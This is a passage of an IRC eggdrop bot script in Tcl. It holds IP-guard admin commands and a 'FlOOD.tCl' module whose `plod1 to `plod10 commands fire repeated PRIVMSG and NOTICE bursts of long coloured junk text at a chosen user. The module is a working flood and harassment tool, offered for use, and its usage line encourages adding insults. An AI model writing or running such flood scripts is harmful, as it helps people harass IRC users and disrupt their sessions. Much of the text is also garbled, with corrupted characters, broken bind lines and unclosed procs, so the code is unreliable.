setuser "config" XTRA "IPG" $ipguard saveuser return 0 } proc pub_-ipguard {nick uhost hand channel param} { global notc set rest [lindex $param 0] if {$rest == ""} { puthlp "NOTICE $nick :$notc Usage: -ipguard " return 0 } if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } set ipguard [getuser "config" XTRA "IPG"] set nipg "" set ok "F" foreach y $ipguard { if {$y == $rest} { set ok "T" puthlp "NOTICE $nick :$notc DeL \[ $rest \] FRoM IpguaRd" } { lappend nipg } } if {$ok == "T"} { setuser "config" XTRA "IPG" $nipg saveuser return 0 } puthlp "NOTICE $nick :$notc $rest not founded..!" } set vern "wget" ################################################################# ### [Batam] - FlOOD.tCl ### [Batam] - Command available : ### [Batam] - `plod1 ### [Batam] - `plod2 ### [Batam] - `plod3 ### [Batam] - `plod4 ### [Batam] - `plod5 ### [Batam] - `plod6 ### [Batam] - `plod7 ### [Batam] - `plod8 ### [Batam] - `plod9 ### [Batam] - `plod10 ################################################################# set CC "`" bind pub o|o bind pub o|o bind pub o|o bind pub o|o bind pub o|o bind pub o|o bind pub o|o bind pub o|o
${CC}plod1 ${CC}plod2 ${CC}plod3 ${CC}plod4 ${CC}plod5 ${CC}plod6 ${CC}plod7 ${CC}plod8
pub_plod1 pub_plod2 pub_plod3 pub_plod4 pub_plod5 pub_plod6 pub_plod7 pub_plod8
bind bind bind bind bind bind bind
pub pub pub pub bot pub pub
o|o ${CC}plod9 pub_plod9 o|o ${CC}plod10 pub_plod10 n ${CC}join pub_join n ${CC}part pub_part - fluuuud dohopflud n hopflud inithopflud n hopmode sethopmode
## public cmd plod1 proc pub_plod1 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N " puthelp "NOTICE $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N " puthelp "PRIVMSG $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N !" puthelp "NOTICE $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N !" puthelp "PRIVMSG $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N !"
puthelp "NOTICE $person : $rest 12,8SE�L AM�A T G�A TH�ER I�NG AN�! � 9,4S E�LAM A�T G A�TH E�R IN�G AN � 11,3S�EL AM�AT G�AT H�ER I�NG A�N � 12,9S E�LA M�AT G�AT H�ER I�NG A�N � 1,13S E�LA M�AT G�ATH E�RI N�GA N �� 12,4S E�LA M�AT �GA T�HE R�IN G�AN �� 9,4SE�L AM�A T G�AT H�ER I�NG A�N! �� 11,3S EL�AM A�T G�A TH�E RI�NG A�N � 0,2S�E LA�M AT� G AT�H ER�I NG�A N �� 1,3S EL�AM A�T G A�TH E�RI N�GA N �!� 12,14S E�LA M�AT G A�TH ER�I NG�AN !� 12,8SE�L AM�AT �G AT�H ER�I NG�AN !� � 9,7S EL�AM A�T GA�TH ER�IN G�AN �� 11,14S EL�AM A�T GA�TH E�R IN�GA N� � 1,9S EL�A MA�T GA�TH E�RI N�GA N� 13,15S EL�A MA�T GA�TH E�RI NG�AN !� � 9,4S E�LA M�AT �GA T�HE R�IN G�A N !" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod1 $person" return 0 } if {$rest==""} { puthelp "NOTICE $nick : wget Usage: plod1 <*add your insult to injury is better :)*>" } } ## public cmd plod2 proc pub_plod2 {nick uhost hand channel rest} { set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "NOTICE $person : $rest , 5 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!" puthelp "PRIVMSG $person : $rest , 9 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!" puthelp "NOTICE $person : $rest , 6 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!
Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!" puthelp "PRIVMSG $person : $rest , 4 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod2 $person" return 0 } if {$rest==""} { puthelp "NOTICE $person : 13 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!" puthelp "PRIVMSG $person : 7 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!" puthelp "NOTICE $person : 12 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!" puthelp "PRIVMSG $person : 12 H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!
Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�!Ha�Ha�Ha! Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�H�a�H�H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha! H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!Ha�Ha�Ha!H�a�H�a�!Ha�Ha�Ha!H�a�H�a�! Ha�Ha�Ha!H�a�H�a�!" putlog " 12( 4 �S� 4oLPoT 12) � !$hand! plod2 $person" return 0 } } ## public cmd plod3 proc pub_plod3 {nick uhost hand channel rest} set person [lindex $rest 0] set rest [lrange $rest 1 end] if {$rest==""} { puthelp "NOTICE $person :$rest ,* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ puthelp "PRIVMSG $person :$rest ,* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ puthelp "NOTICE $person :$rest ,* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ puthelp "PRIVMSG $person :$rest ,* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@ �@@% �@@ �%@@ �%@@ �%@@ �%@* �@% �@
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proc pub_plod4 {nick uhost hand channel rest} { set person [lindex $rest 0]
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set rest [lrange $rest 1 end] if {$rest!=""} { puthelp "PRIVMSG $person :$rest,� 3,7M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M? E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H�M?E?H ��M?E?H ��M?E?H ��M? E?H ��M?E?H ��M?E?H ��M?E?H ��M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H � M?E?H� �M?E?H� �M?E?H�� M?E?H� �M?E?H� �M?E?H�� 3M?E?H� �M?E?H� �M?E?H�� 3M?E?H� �M?E?H� �M?E?H�" puthelp "NOTICE $person :$rest,� 4,9M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M? E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E? H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� �M?E?H� 